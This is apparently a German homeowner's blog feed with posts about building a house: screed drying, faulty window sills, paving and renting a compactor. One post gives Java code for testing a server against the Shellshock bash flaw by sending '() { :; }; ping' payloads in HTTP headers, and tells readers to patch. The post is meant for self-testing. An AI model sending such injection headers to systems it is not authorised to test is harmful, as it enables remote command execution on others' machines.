Montag, 06:28 Uhr. Ich sitze beim Frühstück. Das Handy bimmelt. Eine SMS von meinen Eltern: Gegen 05:00 gab es fünf explosionsartige „Schläge“ aus dem Dachgeschoss, kurz darauf sei die Sicherung raus geflogen. Was war geschehen? Weiterlesen
Beim Tapezieren ist uns plötzlich etwas aufgefallen: Der Estrich liegt im EG ca. 2,5cm niedriger als die Unterkante der bodentiefen Fenster und der Terrassentür….
Mein erster Gedanke: Hä? Kann doch nicht sein. Weiterlesen
Mittlerweile ist das meiste Material für das Bad im Erdgeschoss da: Dusch-Armatur und Brause, Duschkopf, WC mit Deckel und Drücker-Platte, Badewanne mit 3-Loch Armatur und Füßen, Wasserhähne, … Badmöbel sind bestellt.
Das Erdgeschoss ist bis auf den oberen Teil an der Geschosstreppe und ein kleiner Teil im Schlafzimmer fertig tapeziert.
Im Dachgeschoss sind Gästezimmer und Büro (bis auf unter der noch fehlenden Fensterbank) ebenfalls fertig tapeziert,
Die Decke im Eg ist, bis auf das Bad, ein zweites mal gestrichen. Hier haben wir mittlerweile auf eine andere Technik gewechselt: Weiterlesen
Die Zeit vergeht, bestelltes Material kommt. Bestellt hatten wir beim lokalen Hornbach Stein-Fensterbänke in „Agglo Crystal“ … Weiß eben. Maß hatte ich selbst genommen. Die Bestellung dauerte 4 Wochen. Doch daheim angekommen: „Huch, was ist das?“
Der Lieferant bzw. Hersteller hatte es beim Anphasen der Kanten wohl nicht so genau genommen: Im Wohnbereich haben wir für unsere extra breiten „Lichtbänder“ extra lange Fensterbänke bestellt: 2x 2,65m. Aufgrund der Materialeigenschaften mussten diese zwei-geteilt werden (2cm stark auf 2,65m Länge –> Bruchgefahr).
Nun gut. Da wo die beiden Fensterbank-Teile aufeinander treffen gab es an mehreren Kanten eine unterschiedliche Fasung:
Also die Fensterbänke wieder eingepackt und zum Hornbach geschleift. Dort wird jetzt ein zweiter Versuch unternommen. Ich hoffe dabei bleibt es auch… Ich habe wenig Lust da mehrere Versuche zu unternehmen. Denn das dauert jedesmal 4 Wochen. Und der Wunsch-Einzugstermin rückt näher und näher…
Man kann es schon erahnen: Das Licht am Ende des Tunnels…
Ganz langsam aber sicher geht es auf der Baustelle dem Einzug entgegen.
Nachdem nun die Einfahrt fertiggestellt ist …
… geht es im Haus weiter: Weiterlesen
Seit kurzer Zeit ist eine neue, wirklich schwerwiegende Sicherheitslücke bekannt geworden: Shellshock. Nachzulesen hier:
http://www.golem.de/news/bash-luecke-die-hintergruende-zu-shellshock-1409-109463.html
Da immer mehr Eigenheime über Remote-Zugriffe verfügen und diese per HTTP zu erreichen sind, stellt sich unweigerlich die Frage: Ist mein System sicher? Wie teste ich das?
Wer mit Java vertraut ist kann dieses Beispiel hier benutzen (gibt sicher noch andere Wege):
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
public class ShellShockTest {
public static void main(String[] args) throws Exception {
URL url = new URL("http://<zutestenderserver>");
URLConnection conn = url.openConnection();
conn.setRequestProperty("User-Agent", "shellshock-scan (<deinname>)");
conn.setRequestProperty("banners", "true");
conn.setRequestProperty("Cookie", "() { :; }; ping -1 3 <serverfürpingfeedback>");
conn.setRequestProperty("Host", "() { :; }; ping -c 1 <serverfürpingfeedback>");
conn.setRequestProperty("Referer", "() { :; }; ping -c 1 <serverfürpingfeedback>");
BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
String inputLine;
while ((inputLine = in.readLine()) != null)
System.out.println(inputLine);
in.close();
}
}
Ersetze „<zutestenderserver>“ mit dem Namen des Zielsystems.
Damit Du Deinen eigenen Test in den Logfiles identifizieren kannst, ersetze noch „<deinname>“ durch Deinen Namen.
Um zu sehen ob das Zielsystem anfällig ist, wird versucht ein Ping auf ein anderes System auszuführen. Hier solltest du „<serverfürpingfeedback>“ mit einem
ersetzt werden.
Code übersetzen, ausführen und gleichzeitig die Webserver Accesslog-Datei im Auge behalten, sowie auf dem „<serverfürpingfeedback>“ System ein Netzwerktrace auf ICMP Ebene durchführen (wireshark, tcpdump, …).
Im Webserver-Logile wirst du nun den HTTP Request sehen. Sieht bei mir z.B. so aus:
1.2.3.4 - - [26/Sep/2014:10:20:56 +0200] "GET / HTTP/1.1" 200 467 "() { :; }; ping -c 3 4.3.2.1" "shellshock-scan (huhu)"
1.2.3.4 ist das zu testende System, und 4.3.2.1 ist das System für die Ping-Rückmeldung.
Wenn im Netzwerktrace dann ein ICMP Request von 1.2.3.4 auftaucht, dann ist das System über Apache anfällig. Ist das nicht der Fall, bist du erstmal fein raus.
Debian und Ubuntu nutzen übrigens nicht Bash, sondern Dash per Default. Das macht die Sache „etwas“ sicherer. Aber eben nicht „ganz sicher“.
Nichts desto trotz: Sicherstellen dass alle verfügbaren Updates eingespielt wurden….
.. braucht man einen anständigen Rüttler bevor man die Einfahrt pflastert.
Man sollte meinen es ist kein Problem eine Einfahrt in Eigenleistung anständig zu pflastern?! Pustekuchen. Es ist gar nicht so einfach eine Rüttelplatte jenseits von 250kg aufzutreiben. Der örtliche Baustoffhandel vermietet ebenfalls Geräte. Der dort größte Rüttler hat 114kg (oder 140? Weiß nicht mehr genau).
Der Vermieter „Boels“ beim Hornbach in Sinsheim hat auch nur Rüttler bis 140kg. Bei Rent2000 in Rauenberg (das wäre von der Entfernung noch erträglich) hat zwar einen 248kg Rüttler, aber der steht nicht in Rauenberg, sondern in Sandhausen. Das sind allein 40min fahrt, pro Richtung.
Nach einigem hin und her hat mein Haus und Hof-Verleiher in Lobbach doch den 280kg Rüttler schon früher frei. Welch ein Glück…
Heute Abend kann es dann endlich weiter gehen.
Nachdem wir uns nach langem hin und her für einen Pflasterstein entschieden hatten geht es nun wieder mal ans eingemachte:
Vergangenen Mittwoch kam der bestellte Bagger auf der Baustelle an. Geplant war dass mit dem Bagger am Mittwoch die Einfahrt geebnet wird, am Freitag der Split eingebracht wird und am Samstag gleich gepflastert werden kann. Doch wie immer: Es kam anders als geplant. Weiterlesen
Gestern zufällig im IKEA Walldorf gesehen: Ein Schreibtisch der sich elektrisch in der Höhe verstellen lässt.
Stuhlmangelbedingt bin ich heute (freiwillig) eine Weile am Schreibtisch gestanden, statt gesessen. Dabei viel mir wieder der IKEA Schreibtisch ein. Da unsere Firmen-Büromöbel auch von IKEA sind hatte ich das mal schnell gegoogelt. Weiterlesen
Für die Trocknung unseres Estrichs prognostizierte man uns 6-7 Wochen. Gedauert hat es nun keine 4 Wochen.
Das Aufheizprotokoll des Estrichlegers sah folgendes Programm vor: